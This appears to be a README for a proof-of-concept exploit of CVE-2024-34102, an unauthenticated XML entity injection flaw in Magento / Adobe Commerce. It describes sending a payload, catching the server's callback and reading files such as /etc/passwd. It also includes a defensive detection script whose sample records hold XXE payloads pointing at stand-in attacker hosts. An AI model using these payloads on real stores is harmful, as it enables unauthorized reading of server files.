# CVE-2024-34102
POC for CVE-2024-34102, a pre-authentication XML entity injection issue in Magento / Adobe Commerce.


## Overview

This POC attempts to read files from target hosts that are vulnerable to the recent Magento / Adobe Commerce CVE-2024-34102. It is based on a security advisory and on research by Assetnote.

## How to Use

To run this POC, you need a machine with a public, reachable IP address.

### What This POC Does

1. Creates a local file `poc.xml` containing the main payloads.
2. Sends the payload to the target via a POST request.
3. Sets up a listener on your machine for incoming GET requests from the target.
4. Attempts to read files from the target (default: `/etc/passwd`).
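
For defenders, steps 2 and 3 leave two observable events: a POST whose body declares an external DTD or entity, and an outbound GET from the server to the host that declaration names. The following is an added detection example, not part of this POC; the log record fields, the 60-second window and the JSON-escaping handling are assumptions, and the sample records are constructed.

```python
import re
from urllib.parse import urlsplit

# A DOCTYPE or ENTITY declaration that names an external resource by URI.
EXTERNAL_DECL = re.compile(
    r"<!(?:DOCTYPE|ENTITY)\b[^>]*?\b(?:SYSTEM|PUBLIC)\b[^>]*?[\"']"
    r"([a-z][a-z0-9+.\-]*:[^\"'\s>]+)[\"']",
    re.IGNORECASE,
)

def external_uris(body):
    """Return URIs referenced by external DTD/entity declarations in a body."""
    # Assumption: the XML may sit inside a JSON string, so undo \" and \/ first.
    text = body.replace('\\"', '"').replace("\\/", "/")
    return [m.group(1) for m in EXTERNAL_DECL.finditer(text)]

def correlate(inbound, egress, window=60):
    """Pair each suspicious POST with outbound requests to the host it named."""
    findings = []
    for req in inbound:
        if req["method"] != "POST":
            continue
        for uri in external_uris(req["body"]):
            host = urlsplit(uri).hostname
            hits = [e for e in egress if host and e["dst_host"] == host
                    and 0 <= e["ts"] - req["ts"] <= window]
            findings.append({"client": req["client"], "uri": uri,
                             "severity": "confirmed" if hits else "attempt",
                             "callbacks": len(hits)})
    return findings

# Constructed sample records: documentation-range addresses, hypothetical fields.
INBOUND = [
    {"ts": 100, "client": "198.51.100.7", "method": "POST",
     "body": '{"data":"<?xml version=\\"1.0\\"?><!DOCTYPE r SYSTEM '
             '\\"http:\\/\\/203.0.113.9:8000\\/poc.xml\\"><r\\/>"}'},
    {"ts": 130, "client": "198.51.100.8", "method": "POST",
     "body": '{"data":"<order><id>42</id></order>"}'},
    {"ts": 150, "client": "198.51.100.9", "method": "POST",
     "body": '<!DOCTYPE r [<!ENTITY x SYSTEM "http://192.0.2.44/x">]><r>&x;</r>'},
]
EGRESS = [
    {"ts": 101, "src": "10.0.0.5", "dst_host": "203.0.113.9", "dst_port": 8000},
    {"ts": 400, "src": "10.0.0.5", "dst_host": "192.0.2.44", "dst_port": 80},
]

if __name__ == "__main__":
    for finding in correlate(INBOUND, EGRESS):
        print(finding)
```

An `attempt` with no matching egress record still warrants review, since the callback may have been blocked or simply not logged.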

### Minimum Requirements

- Python 3.6 or higher
- `requests` library

To use this POC against a single target:

```
python -u target -ip your-machine-ip -p any-open-port-in-your-machine -r file-to-read-from-target
```

The default for `-r` is `/etc/passwd`.

## Contact

For any suggestions or thoughts, please get in touch with me.

## Disclaimer

This tool is provided for educational purposes only. I do not encourage, condone, or support unauthorized access to any system or network. Use this tool responsibly and only on systems you have explicit permission to test. Any actions and consequences resulting from misuse of this tool are your own responsibility.

## References